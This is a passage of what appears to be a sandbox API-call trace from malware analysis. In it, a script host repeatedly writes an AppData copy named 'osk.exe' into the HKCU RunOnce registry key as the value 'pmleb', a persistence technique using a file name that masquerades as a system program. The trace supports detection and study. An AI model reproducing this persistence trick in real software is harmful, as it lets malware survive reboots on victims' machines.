puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.194] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0079.194] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.194] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.194] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.194] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.195] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.195] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.195] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.195] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.195] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.195] RegCloseKey (hKey=0x280) returned 0x0 [0079.195] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.195] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.195] SetTimer (hWnd=0x20280, nIDEvent=0x202b, uElapse=0xa, lpTimerFunc=0x0) returned 0x202b [0079.195] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.207] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.207] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.207] KillTimer (hWnd=0x20280, uIDEvent=0x202b) returned 1 [0079.207] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.207] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.207] IUnknown:Release (This=0x787518) returned 0x1 [0079.207] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.207] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.208] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.208] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.208] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0079.208] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.208] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2d [0079.208] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.209] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0079.209] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.209] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.209] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.209] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.209] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.209] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.209] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.209] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.210] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.210] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.210] RegCloseKey (hKey=0x280) returned 0x0 [0079.210] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.210] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.210] SetTimer (hWnd=0x20280, nIDEvent=0x202c, uElapse=0xa, lpTimerFunc=0x0) returned 0x202c [0079.210] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.222] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.222] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.223] KillTimer (hWnd=0x20280, uIDEvent=0x202c) returned 1 [0079.223] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.223] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.223] IUnknown:Release (This=0x787518) returned 0x1 [0079.223] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.223] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.223] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.224] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.224] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0079.224] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.224] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2e [0079.224] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.225] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0079.225] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.225] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.225] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.225] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.225] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.225] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.225] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.226] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.226] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.226] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.226] RegCloseKey (hKey=0x280) returned 0x0 [0079.226] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.226] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.226] SetTimer (hWnd=0x20280, nIDEvent=0x202d, uElapse=0xa, lpTimerFunc=0x0) returned 0x202d [0079.226] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.238] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.238] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.238] KillTimer (hWnd=0x20280, uIDEvent=0x202d) returned 1 [0079.238] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.238] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.238] IUnknown:Release (This=0x787518) returned 0x1 [0079.239] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.239] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.239] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.239] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.239] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e [0079.239] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.239] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2f [0079.239] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 